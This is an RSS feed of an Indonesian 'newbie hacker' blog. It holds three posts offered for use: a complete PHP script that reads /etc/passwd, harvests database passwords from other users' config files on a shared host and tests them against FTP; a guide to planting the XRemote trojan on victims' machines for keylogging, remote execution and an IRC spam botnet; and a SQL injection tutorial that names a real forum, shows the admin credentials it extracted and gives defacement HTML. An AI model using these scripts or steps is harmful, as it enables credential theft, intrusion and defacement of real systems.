<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>The Newbie Hacker Blog&#039;s</title>
	<atom:link href="http://anaksapek.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://anaksapek.wordpress.com</link>
	<description>Padang Kota Tercinta Kujaga dan Kubela</description>
	<lastBuildDate>Mon, 13 Sep 2010 06:18:01 +0000</lastBuildDate>
	<language>id</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='anaksapek.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://1.gravatar.com/blavatar/148adada88ac451e4373301283cdc6c9?s=96&#038;d=http%3A%2F%2Fs2.wp.com%2Fi%2Fbuttonw-com.png</url>
		<title>The Newbie Hacker Blog&#039;s</title>
		<link>http://anaksapek.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://anaksapek.wordpress.com/osd.xml" title="The Newbie Hacker Blog&#039;s" />
	<atom:link rel='hub' href='http://anaksapek.wordpress.com/?pushpress=hub'/>
		<item>
		<title>FTP hack buat dapetin cpanel atau yang lainnya</title>
		<link>http://anaksapek.wordpress.com/2009/11/16/ftp-hack-buat-dapetin-cpanel-atau-yang-lainnya/</link>
		<comments>http://anaksapek.wordpress.com/2009/11/16/ftp-hack-buat-dapetin-cpanel-atau-yang-lainnya/#comments</comments>
		<pubDate>Mon, 16 Nov 2009 08:42:47 +0000</pubDate>
		<dc:creator>anaksapek</dc:creator>
				<category><![CDATA[script]]></category>

		<guid isPermaLink="false">http://anaksapek.wordpress.com/2009/11/16/ftp-hack-buat-dapetin-cpanel-atau-yang-lainnya/</guid>
		<description><![CDATA[coba deh gunain script ini script asli dari bl4ck 3ng1n3 Code: &#60;?php echo &#8220;&#60;html&#62;&#8221;; echo &#8220;&#60;title&#62;N 4 C K 0 &#124; CYBERDOS TEAM&#60;/title&#62;&#60;body&#62;&#8221;; set_time_limit(0); ################## @$passwd=fopen(&#8216;/etc/passwd&#8217;,'r&#8217;); if (!$passwd) { echo &#8220;[-] Error : coudn&#8217;t read /etc/passwd&#8221;; exit; } $path_to_public=array(); $users=array(); $pathtoconf=array(); $i=0; while(!feof($passwd)) { $str=fgets($passwd); if ($i&#62;35) { $pos=strpos($str,&#8221;:&#8221;); $username=substr($str,0,$pos); $dirz=&#8221;/home/$username/public_html/&#8221;; if (($username!=&#8221;")) { if [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=anaksapek.wordpress.com&amp;blog=5446579&amp;post=208&amp;subd=anaksapek&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>coba deh gunain script ini<br />
script asli dari bl4ck 3ng1n3</p>
<div><strong>Code:</strong></div>
<p>&lt;?php<br />
echo &#8220;&lt;html&gt;&#8221;;<br />
echo &#8220;&lt;title&gt;N 4 C K 0 | CYBERDOS TEAM&lt;/title&gt;&lt;body&gt;&#8221;;</p>
<p>set_time_limit(0);<br />
##################<br />
@$passwd=fopen(&#8216;/etc/passwd&#8217;,'r&#8217;);<br />
if (!$passwd) {<br />
echo &#8220;[-] Error : coudn&#8217;t read /etc/passwd&#8221;;<br />
exit;<br />
}<br />
<span id="more-208"></span> $path_to_public=array();<br />
$users=array();<br />
$pathtoconf=array();<br />
$i=0;</p>
<p>while(!feof($passwd)) {<br />
$str=fgets($passwd);<br />
if ($i&gt;35) {<br />
$pos=strpos($str,&#8221;:&#8221;);<br />
$username=substr($str,0,$pos);<br />
$dirz=&#8221;/home/$username/public_html/&#8221;;<br />
if (($username!=&#8221;")) {<br />
if (is_readable($dirz)) {<br />
array_push($users,$username);<br />
array_push($path_to_public,$dirz);<br />
}<br />
}<br />
}<br />
$i++;<br />
}<br />
###################</p>
<p>#########################<br />
echo &#8220;&lt;br&gt;&lt;br&gt;&#8221;;<br />
echo &#8220;&lt;textarea name=&#8217;main_window&#8217; cols=100 rows=20&gt;&#8221;;</p>
<p>echo &#8220;[+] Founded &#8220;.sizeof($users).&#8221; entrys in /etc/passwd\n&#8221;;<br />
echo &#8220;[+] Founded &#8220;.sizeof($path_to_public).&#8221; readable public_html directories\n&#8221;;</p>
<p>echo &#8220;[~] Searching for passwords in config.* files&#8230;\n\n&#8221;;<br />
foreach ($users as $user) {<br />
$path=&#8221;/home/$user/public_html/&#8221;;<br />
read_dir($path,$user);<br />
}</p>
<p>echo &#8220;\n[+] Done\n&#8221;;</p>
<p>function read_dir($path,$username) {<br />
if ($handle = opendir($path)) {<br />
while (false !== ($file = readdir($handle))) {<br />
$fpath=&#8221;$path$file&#8221;;<br />
if (($file!=&#8217;.') and ($file!=&#8217;..&#8217;)) {<br />
if (is_readable($fpath)) {<br />
$dr=&#8221;$fpath/&#8221;;<br />
if (is_dir($dr)) {<br />
read_dir($dr,$username);<br />
}<br />
else {<br />
if (($file==&#8217;config.php&#8217;) or ($file==&#8217;config.inc.php&#8217;) or ($file==&#8217;db.inc.php&#8217;) or ($file==&#8217;connect.php&#8217;) or ($file==&#8217;wp-config.php&#8217;) or ($file==&#8217;var.php&#8217;) or ($file==&#8217;configure.php&#8217;) or ($file==&#8217;db.php&#8217;) or ($file==&#8217;configuration.php&#8217;) or ($file==&#8217;db_connect.php&#8217;)) {<br />
$pass=get_pass($fpath);<br />
if ($pass!=&#8221;) {<br />
echo &#8220;[+] $fpath\n$pass\n&#8221;;<br />
ftp_check($username,$pass);<br />
}<br />
}<br />
}<br />
}<br />
}<br />
}<br />
}<br />
}</p>
<p>function get_pass($link) {<br />
@$config=fopen($link,&#8217;r');<br />
while(!feof($config)) {<br />
$line=fgets($config);<br />
if (strstr($line,&#8217;pass&#8217;) or strstr($line,&#8217;password&#8217;) or strstr($line,&#8217;passwd&#8217;)) {<br />
if (strrpos($line,&#8217;&#8221;&#8216;))<br />
$pass=substr($line,(strpos($line,&#8217;=')+3),(strrpos($line,&#8217;&#8221;&#8216;)-(strpos($line,&#8217;=')+3)));<br />
else<br />
$pass=substr($line,(strpos($line,&#8217;=')+3),(strrpos($line,&#8221;&#8216;&#8221;)-(strpos($line,&#8217;=')+3)));<br />
return $pass;<br />
}<br />
}<br />
}</p>
<p>function ftp_check($login,$pass) {<br />
@$ftp=ftp_connect(&#8217;127.0.0.1&#8242;);<br />
if ($ftp) {<br />
@$res=ftp_login($ftp,$login,$pass);<br />
if ($res) {<br />
echo &#8216;[FTP] &#8216;.$login.&#8217;:&#8217;.$pass.&#8221;  Success\n&#8221;;<br />
}<br />
else ftp_quit($ftp);<br />
}<br />
}</p>
<p>echo &#8220;&lt;/textarea&gt;&lt;br&gt;&#8221;;</p>
<p>echo &#8220;&lt;/body&gt;&lt;/html&gt;&#8221;;<br />
?&gt;</p>
<p>source : http://forum.hackers-center.org/viewtopic.php?f=3&amp;t=2726</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/anaksapek.wordpress.com/208/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/anaksapek.wordpress.com/208/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/anaksapek.wordpress.com/208/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/anaksapek.wordpress.com/208/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/anaksapek.wordpress.com/208/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/anaksapek.wordpress.com/208/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/anaksapek.wordpress.com/208/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/anaksapek.wordpress.com/208/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/anaksapek.wordpress.com/208/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/anaksapek.wordpress.com/208/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/anaksapek.wordpress.com/208/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/anaksapek.wordpress.com/208/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/anaksapek.wordpress.com/208/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/anaksapek.wordpress.com/208/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=anaksapek.wordpress.com&amp;blog=5446579&amp;post=208&amp;subd=anaksapek&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://anaksapek.wordpress.com/2009/11/16/ftp-hack-buat-dapetin-cpanel-atau-yang-lainnya/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/9e7b9db864103ecaef1c9dc2b5f8134f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">anaksapek</media:title>
		</media:content>
	</item>
		<item>
		<title>Xtreme Remote</title>
		<link>http://anaksapek.wordpress.com/2009/11/16/xtreme-remote/</link>
		<comments>http://anaksapek.wordpress.com/2009/11/16/xtreme-remote/#comments</comments>
		<pubDate>Mon, 16 Nov 2009 08:39:36 +0000</pubDate>
		<dc:creator>anaksapek</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[remote]]></category>

		<guid isPermaLink="false">http://anaksapek.wordpress.com/?p=206</guid>
		<description><![CDATA[enter][/center] download File 1.Instalasi XRemote terdiri dari dua bagian, yaitu : XRemote.exe (Pengontrol) dan IEXPLORER.exe (Trojan). XRemote adalah bagian yang harus anda jalankan di komputer anda sedangkan IEXPLORER.exe adalah bagian yang harus anda jalankan di komputer target. Instalasi XRemote.exe * Ekstrak semua file Client.zip ke directory komputer anda sesuai keinginan. Jalankan XRemote.exe Instalasi IEXPLORER.exe * [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=anaksapek.wordpress.com&amp;blog=5446579&amp;post=206&amp;subd=anaksapek&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>enter]<img src="http://1.bp.blogspot.com/_DtTjqWJUpmQ/SLtK0eGihoI/AAAAAAAAADg/zM-PLtnqr3A/s320/gb-1.JPG" alt="Image" />[/center]</p>
<p><a rel="nofollow" href="http://www.4shared.com/file/110217379/d69094f5/Remote.html">download File</a></p>
<p>1.Instalasi<br />
XRemote terdiri dari dua bagian, yaitu : XRemote.exe (Pengontrol) dan IEXPLORER.exe (Trojan). XRemote adalah bagian yang harus anda jalankan di komputer anda sedangkan IEXPLORER.exe adalah bagian yang harus anda jalankan di komputer target.</p>
<p>Instalasi XRemote.exe</p>
<p>* Ekstrak semua file Client.zip ke directory komputer anda sesuai keinginan. Jalankan XRemote.exe</p>
<p><span id="more-206"></span>Instalasi IEXPLORER.exe</p>
<p>* Ekstrak semua file Server.zip ke directory komputer target sesuai keinginan. Jalankan IEXPLORER.exe.<br />
* Server ini tidak terlihat di monitor komputer korban.<br />
* Catatan: Komputer pengontrol dan komputer target terhubung di dalam LAN (Local<br />
* Area Network) yang sama ataupun didalam satu kesatuan sistem jaringan yang sama.</p>
<p>2.Koneksi ke komputer target<br />
<img src="http://4.bp.blogspot.com/_DtTjqWJUpmQ/SLtLtmbUjvI/AAAAAAAAADo/gxBEYpGEL9o/s320/gb-2.JPG" alt="Image" /><br />
lik Show Commands dan anda akan melihat tampilan penuh dari XRemote. Anda perlu melakukan koneksi ke komputer korban (Saya anggap anda sudah menginstalasikan trojan ke komputer korban sudah menjalankan trojan tersebut).</p>
<p>Didalam sebuah Jaringan seperti LAN atau Wireless LAN memiliki beberapa komputer client dengan alamat IP yang berbeda. Alamat IP didalam sebuah jaringan umumnya adalah 192.168.0.XX atau 10.10.10.XX. Jika anda tidak mengetahui secara pasti alamat IP korban, scan terlebih dahulu di menu Xremote Server Scanner. Klik Start dan lihat daftar komputer aktif yang telah terinfeksi oleh trojan Scanner akan menunjukkan komputer dengan alamat IP yang telah terinfeksi oleh server XRemote. Isi alamat IP korban dan klik connect untuk dapat mengontrol komputer target dari komputer anda. Jika komputer anda telah konek ke komputer target, maka anda akan melihat kata “connected” di kolom status.</p>
<p>3. FUNGSI DAN OPSI REMOTER<br />
3.1 Ghost Remote<br />
<img src="http://3.bp.blogspot.com/_DtTjqWJUpmQ/SLtMfr_j16I/AAAAAAAAADw/GVfBAMpe_Qs/s320/gb-3.JPG" alt="Image" /><br />
Berikut dibawah ini adalah fungsi yang dapat<br />
dikontrol pada komputer korban.<br />
- Open CD-ROM &#8211; CLOSE CD-ROM<br />
Buka CD-ROM &#8211; Tutup CD-ROM<br />
- Hide Taskbar &#8211; Show Taskbar<br />
Sembunyikan Taskbar – Kembalikan Taskbar yang hilang<br />
- Ram Nuker – Stop Ram Nuker<br />
Menghabiskan resource memory RAM – menghentikan fungsi RAM nuker<br />
- Lock The Mouse – Free The Mouse<br />
Mengunci fungsi mouse – menghentikan penguncian mouse<br />
- Disable Click &#8211; Enable Click<br />
Mematikan fungsi klik pada mouse – mengembalikan fungsi klik pada mouse<br />
- Shutdown PC &#8211; Reboot PC<br />
Matikan komputer korban – Reboot komputer korban<br />
- Disable Cpanel &#8211; Enable Cpanel<br />
Melarang fungsi Control Panel – Mengembalikan Fungsi Control Panel<br />
- Disable Run Menu &#8211; Enable Run Menu<br />
Melarang fungsi RUN &#8211; Mengembalikan Fungsi RUN<br />
- Disable Find Menu &#8211; Enable Find Menu<br />
Melarang fungsi FIND &#8211; Mengembalikan Fungsi FIND &#8211; Ghost Message &#8211; Close Message<br />
Menampilkan Peringatan ke komputer korban bahwa dia telah di-Remote – menutup pesan Ghost Message<br />
- Disable Regedit &#8211; Enable Regedit<br />
Melarang fungsi REGEDIT &#8211; Mengembalikan fungsi REGEDIT<br />
- Disable TaskMan &#8211; Enable TaskMan<br />
Melarang fungsi Task Manager &#8211; Mengembalikan fungsi Task Manager<br />
- Scr Injection &#8211; BlackEnd<br />
Menginjeksi kalimat screen saver 3Dtext dan marquee &#8211; Menghitamkan menuWindows</p>
<p>3.2 Injection / Remote Execution<br />
<img src="http://4.bp.blogspot.com/_DtTjqWJUpmQ/SLtMf-HrfUI/AAAAAAAAAD4/umWMfBXP_7E/s320/gb-4.JPG" alt="Image" /><br />
Injection / Remote Execution adalah menu yang menyertakan fungsi untuk memasukkan file, menjalankan program , membuat registry string dan mematikan proses pada komputer korban.</p>
<p>Menyusupkan file ke komputer korban<br />
Setelah anda berhasil melakukan koneksi ke komputer korban, anda dapat<br />
mengirimkan file secara diam-diam ke komputer target. Pilih dahulu file yang terdapat di komputer anda (YOUR DRIVE) dan tentukan lokasi di komputer korban (REMOTE EXECUTION &#8211; PATH:\MYFILE.EXE) . Cth : C:\filesaya.exe .lalu klik SEND Maka anda telah mengirimkan file filesaya.exe ke komputer korban dimana lokasi virus.exe terdapat di C:\ .</p>
<p>Autorun file hasil susupan di komputer korban<br />
Setelah anda tadi telah menyusupkan filesaya.exe , anda kemudian bisa menentukan apakah filesaya.exe nantinya akan dijalankan setiap kali komputer korban startup. Klik AUTORUN jika anda menginginkan filesaya.exe aktif setiap kali komputer korban dihidupkan.</p>
<p>Menjalankan program di komputer korban<br />
Anda bisa menjalankan program/file music, file gambar, file text di komputer korban. Isi secara lengkap PATH:\REMOTEFILE.EXE . Cth : C:\filesaya.exe dan klik RUN ,maka filesaya.exe akan dieksekusi di komputer korban. Jika anda ingin menjalankan winamp secara remote pada komputer korban, isi kolom menjadi C:\programfiles\winamp\winamp.exe .</p>
<p>Mematikan proses di komputer korban<br />
Anda juga dapat mematikan proses di komputer korban. Isi nama proses yang akan dimatikan di kolom REMOTEFILE.EXE lalu klik KILL misalnya, komputer korban sedang menjalankan Microsoft Word dan anda ingin menutupnya secara remote dari komputer anda. Isi dengan WINWORD.exe dan eksekusikan perintah KILL.</p>
<p>Membuat komputer korban membacakan teks yang anda kirimkan<br />
Membuat komputer korban berbicara sesuka hati anda merupakan salah satu fungsi tambahan yang dimiliki oleh XRemote. Cukup ketikkan kata-kata di kolom dan klik tombol GODSPEAK. Maka komputer korban akan menjadi sebuah mesin yang cerewet.</p>
<p>3.3 Keylogger<br />
<img src="http://3.bp.blogspot.com/_DtTjqWJUpmQ/SLtMf6BO6UI/AAAAAAAAAEA/POlbwDTp44w/s320/gb-5.JPG" alt="Image" /><br />
Seperti namanya, Key = kunci (tombol yang dapat anda ketik di keyboard) dan logger = pencatat/perekam. Keylogger dapat diartikan “Kemampuan sebuah program untuk merekam setiap aktifitas yang dilakukan user diatas keyboard”.<br />
Ketika server trojan XRemote aktif, fungsi keylogger tidak difungsikan pada komoyter korban. Anda dapat mengaktifkan ataupun mematikan keylogger sesuai kehendak.<br />
Klik : START KEYLOGGER dan biarkan korban beraktifitas beberapa saat. Jika anda ingin melihat apa yang telah diketik oleh korban Klik GET LOG FILE, maka trojan akan mengirimkan catatan keylogger ke komputer anda. Klik CLEAR untuk membersihkan log file dan STOP KEYLOGGER untuk menonaktifkan fungsi keylogger.</p>
<p>Aktifitas yang akan dicatat oleh Trojan adalah sebagai berikut :<br />
- Aplikasi yang dijalankan korban<br />
- Karakter yang diketik dengan keyboard oleh korban<br />
3.4. IRC Botnet<br />
<img src="http://2.bp.blogspot.com/_DtTjqWJUpmQ/SLtMgD-IuZI/AAAAAAAAAEI/7c-hqlTI-OY/s320/gb-6.JPG" alt="Image" /><br />
IRC botnet adalah fungsi untuk mengendalikan komputer korban melalui server IRC .<br />
Fungsi ini bersifat massal, artinya anda tidak hanya dapat mengendalikan sebuah komputer saja. Anda dapat mengendalikan seluruh korban trojan XRemote di dalam channel IRC.<br />
Untuk dapat menjalankan fungsi ini, tentunya syarat mutlak adalah anda dan korban harus dalam keadaan terkoneksi ke internet. Klik BOTNET ON untuk mengaktifkan Botnet di komputer korban. Anda juga harus konek ke irc server, isi nick anda di kolom sesuai keinginan dan Klik CONNECT . Baik anda maupun korban akan masuk ke #H.A.C.K irc.dal.net.</p>
<p>Fungsi Command :<br />
<strong>!IDENT </strong>= memerintahkan Botnet untuk mengidentifikasi diri<br />
<strong>!CLEAR</strong> = menghapus log file Botnet<br />
<strong>!SPAM</strong> = memerintahkan Botnet untuk masuk ke channel-channel besar dan melakukan spam<br />
<strong>!NOSPAM </strong>= memerintahkan Botnet untuk keluar dari ke channel-channel besar.<br />
<strong>!CNICK</strong> = memerintahkan Botnet untuk menganti nick<br />
<strong>!MAINROOM </strong>= memerintahkan Botnet untuk join ke channel afiliasi</p>
<p>credit : Indonesia Hacker</p>
<p>&nbsp;</p>
<p>source : http://forum.hackers-center.org/viewtopic.php?f=3&amp;t=3263</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/anaksapek.wordpress.com/206/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/anaksapek.wordpress.com/206/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/anaksapek.wordpress.com/206/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/anaksapek.wordpress.com/206/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/anaksapek.wordpress.com/206/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/anaksapek.wordpress.com/206/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/anaksapek.wordpress.com/206/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/anaksapek.wordpress.com/206/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/anaksapek.wordpress.com/206/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/anaksapek.wordpress.com/206/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/anaksapek.wordpress.com/206/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/anaksapek.wordpress.com/206/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/anaksapek.wordpress.com/206/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/anaksapek.wordpress.com/206/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=anaksapek.wordpress.com&amp;blog=5446579&amp;post=206&amp;subd=anaksapek&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://anaksapek.wordpress.com/2009/11/16/xtreme-remote/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/9e7b9db864103ecaef1c9dc2b5f8134f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">anaksapek</media:title>
		</media:content>

		<media:content url="http://1.bp.blogspot.com/_DtTjqWJUpmQ/SLtK0eGihoI/AAAAAAAAADg/zM-PLtnqr3A/s320/gb-1.JPG" medium="image">
			<media:title type="html">Image</media:title>
		</media:content>

		<media:content url="http://4.bp.blogspot.com/_DtTjqWJUpmQ/SLtLtmbUjvI/AAAAAAAAADo/gxBEYpGEL9o/s320/gb-2.JPG" medium="image">
			<media:title type="html">Image</media:title>
		</media:content>

		<media:content url="http://3.bp.blogspot.com/_DtTjqWJUpmQ/SLtMfr_j16I/AAAAAAAAADw/GVfBAMpe_Qs/s320/gb-3.JPG" medium="image">
			<media:title type="html">Image</media:title>
		</media:content>

		<media:content url="http://4.bp.blogspot.com/_DtTjqWJUpmQ/SLtMf-HrfUI/AAAAAAAAAD4/umWMfBXP_7E/s320/gb-4.JPG" medium="image">
			<media:title type="html">Image</media:title>
		</media:content>

		<media:content url="http://3.bp.blogspot.com/_DtTjqWJUpmQ/SLtMf6BO6UI/AAAAAAAAAEA/POlbwDTp44w/s320/gb-5.JPG" medium="image">
			<media:title type="html">Image</media:title>
		</media:content>

		<media:content url="http://2.bp.blogspot.com/_DtTjqWJUpmQ/SLtMgD-IuZI/AAAAAAAAAEI/7c-hqlTI-OY/s320/gb-6.JPG" medium="image">
			<media:title type="html">Image</media:title>
		</media:content>
	</item>
		<item>
		<title>Deface FOrum buat pemula [exploit]</title>
		<link>http://anaksapek.wordpress.com/2009/11/16/deface-forum-buat-pemula-exploit/</link>
		<comments>http://anaksapek.wordpress.com/2009/11/16/deface-forum-buat-pemula-exploit/#comments</comments>
		<pubDate>Mon, 16 Nov 2009 08:30:40 +0000</pubDate>
		<dc:creator>anaksapek</dc:creator>
				<category><![CDATA[deface]]></category>
		<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://anaksapek.wordpress.com/?p=203</guid>
		<description><![CDATA[nih tutorial asal nya aku download video deface dr temen, trus di file itu ad tutor nya, yaudah ku copast aja kesini langsung ya Ketik di google inurl:/forums.asp?iFor= Pilih target&#8230; Contoh target http://www.portugalweb.net/forum/forums.asp?iFor=23 Hapus angka dibelakang = Hingga menjadi ini http://www.portugalweb.net/forum/forums.asp?iFor= Setelah = masukan SQL inject 12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users Hingga menjadi seperti ini http://www.portugalweb.net/forum/forums &#8230; from+users Tulisan [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=anaksapek.wordpress.com&amp;blog=5446579&amp;post=203&amp;subd=anaksapek&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<div>nih tutorial asal nya aku download video deface dr temen, trus di file itu ad tutor nya, yaudah ku copast  aja kesini</p>
<p>langsung ya</p>
<p>Ketik di google<br />
inurl:/forums.asp?iFor=</p>
<p>Pilih target&#8230;<br />
Contoh target<br />
<!-- m --><a rel="nofollow" href="http://www.portugalweb.net/forum/forums.asp?iFor=23">http://www.portugalweb.net/forum/forums.asp?iFor=23</a><!-- m --></p>
<p>Hapus angka dibelakang =<br />
Hingga menjadi ini<br />
<!-- m --><a rel="nofollow" href="http://www.portugalweb.net/forum/forums.asp?iFor=">http://www.portugalweb.net/forum/forums.asp?iFor=</a><!-- m --></div>
<div>
<p><span id="more-203"></span>Setelah = masukan SQL inject<br />
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users</p>
<p>Hingga menjadi seperti ini<br />
<!-- m --><a rel="nofollow" href="http://www.portugalweb.net/forum/forums.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users">http://www.portugalweb.net/forum/forums &#8230; from+users</a><!-- m --></p>
<p>Tulisan yg berderet di bawah nama 10 TOPICS itu adalah username<br />
Tulisan yg berderet di bawah nama DATED  itu adalah passwordnya</p>
<p>Cari username admin &amp; passnya.<br />
Ok..pada web target yg jadi bahan tutor ini saya menemukan username &amp; password<br />
Username : admin<br />
Password : default</p>
<p>Sekarang klik tulisan login yg berada diatas.<br />
Nah..login udah berhasil<br />
Sekarang jika ingin melakukan defacing, klik tulisan &#8220;POST NEW TOPICS&#8221;</p>
<p>Isi Subject nya&#8230;<br />
Contoh : HACKED BY BLA BLA BLA<br />
lalu masukin script deface HTML nya ke kolom di bawah subject.</p>
<p>Hmm&#8230;&#8230;<br />
Jika ingin menutup full seluruh halaman, pake code berikut</p>
<p>&lt;DIV align=center&gt;&lt;DIV id=Layer1 style=&#8221;BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px; Z-INDEX: 1; LEFT: 0px; BORDER-LEFT: white 1px; WIDTH: 1300px; BORDER-BOTTOM: white 1px; POSITION: absolute; TOP: 0px; HEIGHT: 7000px; BACKGROUND-COLOR: white; layer-background-color: white&#8221;&gt;&lt;center&gt;<br />
&lt;br&gt;&lt;b&gt;&lt;font face=&#8221;papyrus&#8221; color=&#8221;red&#8221; size=&#8221;5&#8243;&gt;Attacked by : Ichito-Bandito&lt;/font&gt;&lt;/h2&gt;&lt;br&gt;&lt;br&gt;&lt;img src=&#8221;http://forum.hackers-center.org/styles/melankolia/theme/images/site_logo.jpg&#8221; &gt;&lt;br&gt;&lt;br&gt;<br />
&lt;font face=&#8221;papyrus&#8221; color=&#8221;red&#8221; size=&#8221;5&#8243;&gt;FUCK Malaysial and ASSOCIATE&lt;/a&gt;&lt;br&gt;&lt;br&gt;<br />
&lt;font face=&#8221;papyrus&#8221; color=&#8221;red&#8221; size=&#8221;5&#8243;&gt;We Are Ready to Cybernetic Wars&lt;/font&gt;&lt;br&gt;&lt;br&gt;&lt;font color=&#8221;red&#8221; size=&#8221;3&#8243;&gt;Hackers-center In Here<br />
&lt;/DIV&gt;</p>
<p>kalo mau di tambah lagu juga bisa:<br />
: &lt;embed src=&#8221;[color=#0000FF]Url Lagu&#8221; autoplay=&#8221;true&#8221; hidden=&#8221;true&#8221;&gt;&lt;/embed&gt;[/color]</p>
<p>Jangan lupa di edit dulu kataÂ² nya !!!</p>
<p>Trus klik tombol post&#8230;.<br />
Ok&#8230;HTML deface an lo udah masuk&#8230;sekarang klik judul postingan yg lo tulis di subject tadi.</p></div>
<div></div>
<div>source : http://forum.hackers-center.org/viewtopic.php?f=3&amp;t=3255</div>
<p>&nbsp;</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/anaksapek.wordpress.com/203/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/anaksapek.wordpress.com/203/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/anaksapek.wordpress.com/203/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/anaksapek.wordpress.com/203/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/anaksapek.wordpress.com/203/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/anaksapek.wordpress.com/203/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/anaksapek.wordpress.com/203/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/anaksapek.wordpress.com/203/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/anaksapek.wordpress.com/203/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/anaksapek.wordpress.com/203/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/anaksapek.wordpress.com/203/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/anaksapek.wordpress.com/203/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/anaksapek.wordpress.com/203/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/anaksapek.wordpress.com/203/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=anaksapek.wordpress.com&amp;blog=5446579&amp;post=203&amp;subd=anaksapek&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://anaksapek.wordpress.com/2009/11/16/deface-forum-buat-pemula-exploit/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/9e7b9db864103ecaef1c9dc2b5f8134f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">anaksapek</media:title>
		</media:content>
	</item>
		<item>
		<title>Security KlikBCA &#8211; Recover Password With XSS</title>
		<link>http://anaksapek.wordpress.com/2009/11/16/security-klikbca-recover-password-with-xss/</link>
